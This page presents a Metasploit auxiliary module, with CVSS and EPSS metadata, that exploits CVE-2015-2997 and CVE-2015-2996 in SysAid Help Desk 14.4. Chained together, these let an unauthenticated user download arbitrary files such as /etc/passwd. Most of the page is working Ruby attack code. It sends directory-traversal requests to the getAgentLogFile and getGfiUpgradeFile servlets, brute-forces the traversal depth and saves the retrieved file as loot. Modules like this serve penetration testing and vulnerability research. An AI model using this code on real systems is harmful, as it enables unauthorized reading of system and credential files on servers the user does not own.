SysAid Help Desk Arbitrary File Download

2015-06-0320:59:45

Pedro Ribeiro <[email protected]>

www.rapid7.com

8.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:P/I:N/A:C

0.727 High

EPSS

Percentile

98.0%

JSON

This module exploits two vulnerabilities in SysAid Help Desk that allows an unauthenticated user to download arbitrary files from the system. First, an information disclosure vulnerability (CVE-2015-2997) is used to obtain the file system path, and then we abuse a directory traversal (CVE-2015-2996) to download the file. Note that there are some limitations on Windows, in that the information disclosure vulnerability doesn’t work on a Windows platform, and we can only traverse the current drive (if you enter C:\afile.txt and the server is running on D:\ the file will not be downloaded). This module has been tested with SysAid 14.4 on Windows and Linux.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SysAid Help Desk Arbitrary File Download',
        'Description' => %q{
          This module exploits two vulnerabilities in SysAid Help Desk that allows
          an unauthenticated user to download arbitrary files from the system. First, an
          information disclosure vulnerability (CVE-2015-2997) is used to obtain the file
          system path, and then we abuse a directory traversal (CVE-2015-2996) to download
          the file. Note that there are some limitations on Windows, in that the information
          disclosure vulnerability doesn't work on a Windows platform, and we can only
          traverse the current drive (if you enter C:\afile.txt and the server is running
          on D:\ the file will not be downloaded).

          This module has been tested with SysAid 14.4 on Windows and Linux.
        },
        'Author' => [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2015-2996'],
          ['CVE', '2015-2997'],
          ['URL', 'https://seclists.org/fulldisclosure/2015/Jun/8'],
          ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt'],
        ],
        'DisclosureDate' => '2015-06-03'
      )
    )

    register_options(
      [
        OptPort.new('RPORT', [true, 'The target port', 8080]),
        OptString.new('TARGETURI', [ true, 'SysAid path', '/sysaid']),
        OptString.new('FILEPATH', [false, 'Path of the file to download (escape Windows paths with a back slash)', '/etc/passwd']),
      ]
    )
  end

  def get_traversal_path
    print_status('Trying to find out the traversal path...')
    large_traversal = '../' * rand(15...30)
    servlet_path = 'getAgentLogFile'

    # We abuse getAgentLogFile to obtain the
    res = send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
      'method' => 'POST',
      'data' => Zlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) + rand(300))),
      'ctype' => 'application/octet-stream',
      'vars_get' => {
        'accountId' => large_traversal + Rex::Text.rand_text_alphanumeric(rand(8..17)),
        'computerId' => Rex::Text.rand_text_alphanumeric(rand(8..17))
      }
    })

    if res && res.code == 200 && res.body.to_s =~ %r{<H2>(.*)</H2>}
      error_path = ::Regexp.last_match(1)
      # Error_path is something like:
      # /var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../ajkdnjhdfn/1421678611732.zip
      # This calculates how much traversal we need to do to get to the root.
      position = error_path.index(large_traversal)
      unless position.nil?
        return '../' * (error_path[0, position].count('/') - 2)
      end
    end
  end

  def download_file(download_path)
    return send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(datastore['TARGETURI'], 'getGfiUpgradeFile'),
      'vars_get' => {
        'fileName' => download_path
      }
    })
  rescue Rex::ConnectionRefused
    print_error('Could not connect.')
    return
  end

  def run
    # No point to continue if filepath is not specified
    if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty?
      fail_with(Failure::BadConfig, 'Please supply the path of the file you want to download.')
    end

    print_status("Downloading file #{datastore['FILEPATH']}")
    if datastore['FILEPATH'] =~ /([A-Za-z]{1}):(\\*)(.*)/
      file_path = ::Regexp.last_match(3)
    else
      file_path = datastore['FILEPATH']
    end

    traversal_path = get_traversal_path
    if traversal_path.nil?
      print_error('Could not get traversal path, using bruteforce to download the file')
      count = 1
      while count < 15
        res = download_file(('../' * count) + file_path)
        if res && res.code == 200 && res.body.to_s.bytesize != 0
          break
        end

        count += 1
      end
    else
      res = download_file(traversal_path[0, traversal_path.length - 1] + file_path)
    end

    if res && res.code == 200
      if res.body.to_s.bytesize == 0
        fail_with(Failure::NoAccess, "#{peer} - 0 bytes returned, file does not exist or it is empty.")
      else
        vprint_line(res.body.to_s)
        fname = File.basename(datastore['FILEPATH'])

        path = store_loot(
          'sysaid.http',
          'application/octet-stream',
          datastore['RHOST'],
          res.body,
          fname
        )
        print_good("File saved in: #{path}")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - Failed to download file.")
    end
  end
end